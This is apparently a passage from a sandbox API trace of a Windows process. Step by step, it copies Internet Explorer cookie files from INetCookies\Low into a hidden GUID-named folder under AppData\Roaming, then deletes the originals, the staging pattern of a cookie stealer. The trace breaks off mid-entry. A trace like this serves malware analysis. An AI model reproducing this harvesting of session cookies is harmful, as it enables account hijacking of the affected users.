CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.082] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.082] StrChrW (lpStart="8FFCGS26.txt", wMatch=0x74c005c) returned 0x0 [0252.082] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="8FFCGS26.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\8FFCGS26.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\8FFCGS26.txt" [0252.082] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\8FFCGS26.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\8ffcgs26.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\8FFCGS26.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\8ffcgs26.txt"), bFailIfExists=0) returned 1 [0252.099] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\8FFCGS26.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\8ffcgs26.txt")) returned 1 [0252.100] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.100] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.100] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.100] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.100] StrChrW (lpStart="Low\\9ABR37NL.txt", wMatch=0x74c005c) returned="\\9ABR37NL.txt" [0252.100] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.100] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.100] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.100] StrChrW (lpStart="9ABR37NL.txt", wMatch=0x74c005c) returned 0x0 [0252.100] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="9ABR37NL.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\9ABR37NL.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\9ABR37NL.txt" [0252.100] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\9ABR37NL.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\9abr37nl.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\9ABR37NL.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\9abr37nl.txt"), bFailIfExists=0) returned 1 [0252.105] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\9ABR37NL.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\9abr37nl.txt")) returned 1 [0252.106] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.106] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.106] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.107] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.107] StrChrW (lpStart="Low\\9IJPMFHZ.txt", wMatch=0x74c005c) returned="\\9IJPMFHZ.txt" [0252.107] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.107] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.107] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.107] StrChrW (lpStart="9IJPMFHZ.txt", wMatch=0x74c005c) returned 0x0 [0252.107] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="9IJPMFHZ.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\9IJPMFHZ.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\9IJPMFHZ.txt" [0252.107] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\9IJPMFHZ.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\9ijpmfhz.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\9IJPMFHZ.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\9ijpmfhz.txt"), bFailIfExists=0) returned 1 [0252.112] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\9IJPMFHZ.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\9ijpmfhz.txt")) returned 1 [0252.113] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.113] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.114] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.114] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.114] StrChrW (lpStart="Low\\9M7ZHW1Q.txt", wMatch=0x74c005c) returned="\\9M7ZHW1Q.txt" [0252.114] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.114] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.114] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.114] StrChrW (lpStart="9M7ZHW1Q.txt", wMatch=0x74c005c) returned 0x0 [0252.114] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="9M7ZHW1Q.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\9M7ZHW1Q.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\9M7ZHW1Q.txt" [0252.114] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\9M7ZHW1Q.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\9m7zhw1q.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\9M7ZHW1Q.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\9m7zhw1q.txt"), bFailIfExists=0) returned 1 [0252.118] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\9M7ZHW1Q.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\9m7zhw1q.txt")) returned 1 [0252.120] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.120] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.120] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.120] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.120] StrChrW (lpStart="Low\\9XACNSYG.txt", wMatch=0x74c005c) returned="\\9XACNSYG.txt" [0252.120] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.120] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.120] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.120] StrChrW (lpStart="9XACNSYG.txt", wMatch=0x74c005c) returned 0x0 [0252.120] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="9XACNSYG.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\9XACNSYG.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\9XACNSYG.txt" [0252.120] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\9XACNSYG.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\9xacnsyg.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\9XACNSYG.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\9xacnsyg.txt"), bFailIfExists=0) returned 1 [0252.127] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\9XACNSYG.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\9xacnsyg.txt")) returned 1 [0252.128] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.128] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.128] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.128] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.128] StrChrW (lpStart="Low\\9Z1Y5ICI.txt", wMatch=0x74c005c) returned="\\9Z1Y5ICI.txt" [0252.128] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.128] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.129] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.129] StrChrW (lpStart="9Z1Y5ICI.txt", wMatch=0x74c005c) returned 0x0 [0252.129] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="9Z1Y5ICI.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\9Z1Y5ICI.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\9Z1Y5ICI.txt" [0252.129] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\9Z1Y5ICI.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\9z1y5ici.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\9Z1Y5ICI.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\9z1y5ici.txt"), bFailIfExists=0) returned 1 [0252.142] DeleteFileW 